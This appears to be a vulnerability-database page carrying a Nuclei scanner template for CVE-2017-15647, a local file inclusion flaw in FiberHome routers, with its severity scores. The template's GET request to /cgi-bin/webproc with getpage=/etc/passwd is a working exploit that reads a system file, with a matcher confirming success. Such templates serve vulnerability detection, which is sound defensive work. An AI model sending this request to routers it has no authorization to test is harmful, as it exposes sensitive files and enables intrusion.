Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-15647
HistoryJul 27, 2021 - 11:36 a.m.

FiberHome Routers - Local File Inclusion

2021-07-2711:36:29
ProjectDiscovery
github.com
4

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.018 Low

EPSS

Percentile

88.0%

FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.

id: CVE-2017-15647

info:
  name: FiberHome Routers - Local File Inclusion
  author: daffainfo
  severity: high
  description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the system, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest firmware update provided by FiberHome to fix the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/44054
    - https://blogs.securiteam.com/index.php/archives/3472
    - https://nvd.nist.gov/vuln/detail/CVE-2017-15647
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-15647
    cwe-id: CWE-22
    epss-score: 0.02013
    epss-percentile: 0.87655
    cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fiberhome
    product: routerfiberhome_firmware
  tags: cve,cve2017,lfi,router,edb,fiberhome

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203513281b74742f1d061e55c6bc357a67370e41dfb03d3f08e2069446d0ce9027022100836ce8dfc0a95006b88f619db7dda2aa36924a9079735d9cd8d4c3044d4a84fd:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.018 Low

EPSS

Percentile

88.0%